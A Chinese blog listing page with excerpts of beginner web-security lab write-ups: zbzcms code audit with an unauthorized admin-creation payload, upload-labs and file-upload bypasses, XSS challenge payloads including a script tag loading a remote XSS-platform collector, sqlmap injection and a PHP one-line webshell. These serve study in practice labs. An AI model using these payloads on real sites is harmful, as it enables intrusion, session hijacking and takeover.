自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 zbzcms代码审计实验2

前台未授权添加管理员一、用seay代码审计系统,自动审计代码,发现可疑代码二、查看代码,并分析看看发现可疑参数mima和guanliyuan,即密码和管理员,构造URL/cms/cms/admin/run_ajax.php?run=admin构造payloadmima=haha123&guanliyuan=haha三、使用hackbar插件执行payload发现返回一个值为5尝试用构造的管理员用户和密码登录看看发现权限不足无法登录,这里有两种方

2021-12-15 14:19:20 2905

原创 代码审计之文件上传漏洞实验

一、phpstudy搭建zbzcms.com网站二、使用seay源代码审计工具1.进行自动审计,发现可疑文件上传的漏洞2.双击打开,分析代码,添加变量输出$_FILES添加代码如下:var_dump($_FILES);3.在网站根目录下新建html文件内容如下<html><head><meta charset="utf-8"><title>xxx</title></head><body><

2021-12-08 16:41:47 3434

原创 搭建域环境

一、准备两台机器并设置ip地址如下Windows server 2012 R2:192.168.1.1Windows server 2008 R2:192.168.1.2二、Windows Server 2012 R2服务器配置1.设置服务器设置ip为192.168.1.1子网掩码为255.255.255.0DNS指向本机ip地址设置为192.168.1.1或127.0.0.1——>控制面板>网络和Internet>网络和共享中心中打开Ethernet0配置网络Ipc

2021-12-07 11:53:41 344

原创 phpstorm配置xdebug

下载安装phpstorm,及配置xdebug

2021-12-07 11:33:39 353

原创 upload-labs通关教程

Pass-1-js检查源码:PHP文件直接上传发现不可以因为源码定义了上传文件类型检查删除下图位置return checkFile()php即可上传Pass-2-只验证Content-type源码:仅仅判断content-type类型,因此上传xx.php抓包修改content-type为图片类型:image/jpeg、image/png、image/gif成功过关Pass-3-黑名单绕过无解???...

2020-11-02 20:15:14 474 1

原创 phpstudy搭建upload-labs

下载并安装PHPstudy的安装包下载链接: http://www.phpstudy.net/ (https://www.xp.cn)打开phpstudy界面并开启服务创建网站配置upload-labs下载链接: https://github.com/c0ny1/upload-labs下载后解压放在我们之前安装好的phpstudy的WWW目录里打开网站访问即可访问成功...

2020-11-02 19:41:27 1861

原创 DOM型XSS

DOM-XSS攻击原理与防御XSS的中文名称叫跨站脚本,是WEB漏洞中比较常见的一种,特点就是可以将恶意HTML/JavaScript代码注入到受害用户浏览的网页上,从而达到劫持用户会话的目的。XSS根据恶意脚本的传递方式可以分为3种,分别为反射型、存储型、DOM型,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM型来说比较好检测与防御,而DOM型不用将恶意脚本传输到服务器在返回客户端,这就是DOM型和反射、存储型的区别,所以我这里就单独的谈一下DOM型XSS。...

2020-11-02 19:29:42 638

原创 xss平台练习

1.靶机蓝莲花BLUE-LOTUShttp://117.167.136.240:10080/admin.php默认登录密码:bluelotus2.靶机网站http://117.167.136.240:38001/找输入口找到输入口在register弹出框如下:添加新的default模板并生成payload复制payload:<script src="http://117.167.136.240:10080/myjs/s.js"></script>成

2020-10-22 21:12:58 402

原创 存储型XSS漏洞

什么是存储型XSS:攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。因为存储型XSS的代码存在于网页的代码中,可以说是永久型的。1.弹框测试添加js,选择alert.js点击生成payload并复制复制...

2020-10-21 21:42:30 2714

原创 BlueLotus_XSSReceiver——XSS数据接收工具的安装(靶机)

1.将BlueLotus_XSSReceiver放到PHPstudy_pro的www目录下2.打开phpstudy创建BlueLotus网站并创建数据库3.将网站根目录设置在新建网站的BlueLotus里的BlueLotus_XSSReceiver 下4.打开网站搭建成功5.复制后台登录密码登录即可...

2020-10-21 18:36:13 1480

原创 用phpStudy搭建DVWA漏洞测试环境

1.下载、安装PhpStudy下载地址传送门:http://phpstudy.php.cn/download.html2.下载、存放DVWA下载地址传送门:http://www.dvwa.co.uk/github项目:https://github.com/ethicalhack3r/DVWA下载后从压缩包DVWA-mater.zip解压出的文件夹名字是DVWA-master,为了方便url输入访问,可以把此名字修改为dvwa,然后把它存放到phpStudy的网站目录之下…\phpStudy2018

2020-10-21 12:40:25 773 1

原创 XSS挑战之旅level7-10

Level 7输入一个”>试试,发现script标签被删除了!Href和on也被删除了,尝试双写绕过Payload:“><scrscriptipt>alert(‘xss’)</scriscriptpt>“ oonnmouseover=alert ‘1’“><a hrhrefef=javasscriptcript:alert(‘xss’)>hh</a>Level 8基础知识:javascript:伪协议声明了URL的主体是任意

2020-10-19 21:59:01 224

原创 xss挑战之旅level1-6

什么是xss跨站点脚本(XSS)是向真实网站添加恶意代码以便恶意收集用户信息的过程。XSS 攻击可能通过 Web 应用程序中的安全漏洞进行,并且通常通过注入客户端脚本来利用。虽然通常使用 JavaScript,但一些攻击者也使用 VBScript,ActiveX 或 Flash。Level 1输入点在url中,反射型 http://192.168.152.129/level1.php?name=<script>alert(1)</script>Level 2搜索型,查

2020-10-15 22:10:18 259 1

原创 centos安装xss平台,及docker compose的下载

用xshell连接虚拟机中的centos7(上篇博客写过)1.安装xss平台下载xss源码zip打开xshell输入命令下载 lrzszyum install lrzsz输入rz上传文件XSS-challenge-tour.zip下载文件sz XSS-challenge-tour.zip解压下载的XSS-challenge-tour.zip文件unzip XSS-challenge-tour.zip到XSS-challenge-tour路径下cd XSS-chall

2020-10-14 22:59:59 726

原创 虚拟机配置及centos docker安装

1.查看虚拟机配置找到 控制面板 选择 卸载程序点击 启用或关闭Windows功能查看虚拟机平台是否关闭如果关闭虚拟机则会出现下面情况2.docker安装(1).使用官方安装脚本自动安装安装命令如下:curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun也可以使用国内 daocloud 一键安装命令:curl -sSL https://get.daocloud.io/docker | sh

2020-10-13 21:26:01 228 2

原创 sql注入之宽字节注入

1.报错注入2.宽字节注入

2020-09-30 14:45:36 317

原创 CTF实例题-盲注

1.例题如下

2020-09-26 19:50:47 757

原创 sql注入之盲注

一.布尔型盲注题目:题目为sqllab-less-81.(1)正常页面回显?id=1 and 1=1 (2)页面出错?id=1' and 1=22.先判断数据库长度?id=0' or length(database())>7--+ true?id=0' or length(database())>8--+ false?id=0' or length(database())=8--+ true最后确认数据库长度为83.猜库名此时我们需要

2020-09-23 18:01:14 316

原创 CTF实例题

1.靶机目标 http://117.167.136.244:280572.靶机为post请求即用burpsuite抓包打开burpsuite3.用burpsuite对靶机进行抓包找到购买卡密进行购买卡密打开intercept抓包成功找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo4.用sqlmap注入(1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act

2020-09-17 22:18:11 1320 1

原创 PHP一句话木马实验

1.打开phpstudy启动Apache打开网站根目录新建shell.php文本文件编辑内容为(可使用notepad++编辑)2.进入靶机找到上传文件点并上传shell.php文件3.在新闻管理中找到实验1点击修改点击文件右键选择在 ‘新标签页中打开图片’显示如下图则成功4.打开蚁剑单击空白处点击右键’添加数据’URL地址为步骤3中 '新标签页中打开图片’的地址连接密码为shell(@eval($_POST[‘shell’]);)添加成功找到flag

2020-09-14 21:55:37 1193

原创 sqlmap注入简单实例

sqlmap详情见上篇《sqlmap安装及简单使用实例》1.打开 sqlmap ,通过命令 python sqlmap.py -u “url” --dump -T “manager” -D “rjxy" 找到目标密码2.目标密码为:ZGM2M2VlMmUyYTE2M2QONmE3MGFiNDRhNzUxYzBkMjA=用base64解密为:dc63ee2e2a163d46a70ab44a751c0d20再用MD5解码为:ahead8418最终完成解密...

2020-09-10 21:23:03 322

原创 sqlmap安装及简单使用实例

1.sqlmap安装前需要搭建python环境,下载python最新版本下载地址:https://www.python.org/downloads/下载完成Windows+r 打开cmd中输入python检查是否下好下载python成功2.下载sqlmap下载地址:http://sqlmap.org/3.将下载的SQLMAP安装包解压到文件夹sqlmap中,并拷贝到自己下好的python目录下 例如“D:\Program Files\Python38”4.然后在桌面新建立一个cmd的

2020-09-09 21:52:07 394

原创 centos搭建宝塔-宝塔安装sqllab的过程

centos搭建宝塔和宝塔搭建网站准备:在虚拟机中装centos环境,下载xshall和虚拟机ssh连接虚拟机,找到虚拟机ip地址,在虚拟机中输入 ip addr找到ipWindows用户打开xshell,点击新建,将虚拟机ip地址插入点击确认后,双击新建会话刷新连接输入用户和密码后成功建立连接3.安装宝塔面板https://www.bt.cn/bbs/thread-19376-1-1.html复制cent os 安装命令4.成功下载宝塔5.根据内网面板地址找到宝塔登

2020-09-08 21:45:14 274

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除